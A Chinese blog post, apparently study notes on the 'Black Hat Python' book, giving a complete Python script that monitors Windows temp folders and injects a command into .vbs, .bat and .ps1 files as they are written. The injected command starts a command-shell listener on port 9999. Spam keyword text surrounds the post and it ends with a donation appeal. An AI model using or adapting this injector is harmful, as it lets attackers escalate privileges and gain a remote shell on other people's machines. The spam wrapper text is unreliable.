日韩久久久精品,亚洲精品久久久久久久久久久,亚洲欧美一区二区三区国产精品 ,一区二区福利

Python黑帽子:黑客與滲透測(cè)試編程之道 windows系統(tǒng)提取篇3 在文件

系統(tǒng) 2018 0

代碼思路:

首先定義三個(gè)文件類型。.vbs,.bat,.ps1。對(duì)這三個(gè)后綴名的文件進(jìn)行監(jiān)視,并根據(jù)后綴名不同,插入不同的代碼。(意思都是運(yùn)行那個(gè)command)。

windows是創(chuàng)建一個(gè)文件并寫入數(shù)據(jù)的過(guò)程,其實(shí)就是先create,再modify,所以當(dāng)檢測(cè)到有后綴名為windows下可以執(zhí)行的文件被修改時(shí)。就可以插入惡意代碼。這里簡(jiǎn)單的用一個(gè)inject_code()函數(shù)來(lái)表示插入的過(guò)程。

同時(shí)為了區(qū)分一個(gè)臨時(shí)文件是否已經(jīng)被插入了惡意代碼,可以使用一個(gè)標(biāo)志位加以區(qū)分。

代碼:

            import win32file
import tempfile
import threading
import os
import win32con

dir_minitor=["C:\\Windows\\Temp",tempfile.gettempdir()]
FILE_CREATED =1
FILE_DELETED =2
FILE_MODIFIED = 3
FILE_RENAMED_FROM=4
FILE_RENAMED_TO = 5

file_type={}
command="C:\\WINDOWS\\TEMP\\bhpnet.exe -l -p 9999 -c"
file_type['.vbs']=['\r\nbhpmarker\r\n','\r\nCreateObject(\"Wscript.Shell\").Run(\"%s\")\r\n'%command]
file_type['.bat']=['\r\nbhpmarker\r\n','\r\n%s\r\n'%command]
file_type['.ps1']=['\r\nbhpmarker\r\n','Start-Process\"%s\"\r\n'%command]

#print file_type.keys()
def code_inject(full_filename,extension,contents):
    #print "run"
    if file_type[extension][0] in contents:
        #print "hahha"
        return
    full_content=file_type[extension][0]
    full_content+=file_type[extension][1]
    full_content+=contents

    fd=open(full_filename,"wb")
    fd.write(full_content)
    fd.close()

    print "Injected code"
    return

def startMimitor(dir):
    FILE_LIST_DIRECTORY=0x0001
    dir_director=win32file.CreateFile(
        dir,
        FILE_LIST_DIRECTORY,
        win32con.FILE_SHARE_READ|win32con.FILE_SHARE_WRITE|win32con.FILE_SHARE_DELETE,
        None,
        win32con.OPEN_EXISTING,
        win32con.FILE_FLAG_BACKUP_SEMANTICS,
        None
    )
    while 1:
        try:
            results=win32file.ReadDirectoryChangesW(
                dir_director,
                1024,
                True,
                win32con.FILE_NOTIFY_CHANGE_DIR_NAME|win32con.FILE_NOTIFY_CHANGE_FILE_NAME|win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES|win32con.FILE_NOTIFY_CHANGE_SIZE|win32con.FILE_NOTIFY_CHANGE_LAST_WRITE|win32con.FILE_NOTIFY_CHANGE_SECURITY,
                None,
                None
            )
            for action,file_name in results:
                full_filename=os.path.join(dir,file_name)
                #print full_filename
                filename,extension = os.path.splitext(full_filename)
                # print filename
                # print extension
                if extension in file_type:
                    flag=1
                if action==FILE_CREATED:
                    if flag:
                        print "[*] Created %s"%full_filename
                elif action==FILE_DELETED:
                    if flag:
                        print "[-] Deleted %s"%full_filename
                elif action==FILE_MODIFIED:
                    if flag:
                        print "[*] Modified %s"%full_filename

                        print "[vvv] Dumping contents ...."
                        try:
                            fd = open(full_filename,"rb")
                            contents=fd.read()
                            fd.close()
                            print contents
                            print "[^^^] Dump complete."
                        except:
                            print "[!!!] Failed"
                        filename,extension=os.path.splitext(full_filename)
                        print full_filename+extension+contents
                        code_inject(full_filename,extension,contents)
                elif action==FILE_RENAMED_FROM:
                    if flag:
                        print "[>] Renamed from :%s"%full_filename
                elif action==FILE_RENAMED_TO:
                    if flag:
                        print "[<] Renamed to %s"%full_filename
                else:
                    if flag:
                        print "[???] Unknown:%s"%full_filename
        except:
            pass


for path in dir_minitor:
    monitor_thread = threading.Thread(target=startMimitor,args=(path,))
    print "Spawning monitoring thread for path:%s"%path
    # print file_type
    # if '.bat' in file_type.keys():
    #     print file_type
    monitor_thread.start()
          

運(yùn)行結(jié)果:

Python黑帽子:黑客與滲透測(cè)試編程之道 windows系統(tǒng)提取篇3 在文件監(jiān)視器中插入代碼_第1張圖片

?

?


更多文章、技術(shù)交流、商務(wù)合作、聯(lián)系博主

微信掃碼或搜索:z360901061

微信掃一掃加我為好友

QQ號(hào)聯(lián)系: 360901061

您的支持是博主寫作最大的動(dòng)力,如果您喜歡我的文章,感覺(jué)我的文章對(duì)您有幫助,請(qǐng)用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點(diǎn)擊下面給點(diǎn)支持吧,站長(zhǎng)非常感激您!手機(jī)微信長(zhǎng)按不能支付解決辦法:請(qǐng)將微信支付二維碼保存到相冊(cè),切換到微信,然后點(diǎn)擊微信右上角掃一掃功能,選擇支付二維碼完成支付。

【本文對(duì)您有幫助就好】

您的支持是博主寫作最大的動(dòng)力,如果您喜歡我的文章,感覺(jué)我的文章對(duì)您有幫助,請(qǐng)用微信掃描上面二維碼支持博主2元、5元、10元、自定義金額等您想捐的金額吧,站長(zhǎng)會(huì)非常 感謝您的哦!!!

發(fā)表我的評(píng)論
最新評(píng)論 總共0條評(píng)論
主站蜘蛛池模板: 应城市| 沁阳市| 巫溪县| 吉安市| 连云港市| 北海市| 温宿县| 织金县| 资源县| 夏邑县| 香港 | 岫岩| 黑水县| 溆浦县| 太白县| 新丰县| 元江| 泰兴市| 温泉县| 临泽县| 渭源县| 娄烦县| 大埔县| 桑日县| 西城区| 明光市| 云和县| 华蓥市| 合水县| 米脂县| 咸阳市| 乌苏市| 北碚区| 沁阳市| 吕梁市| 饶河县| 滦平县| 万山特区| 伊吾县| 长岛县| 关岭|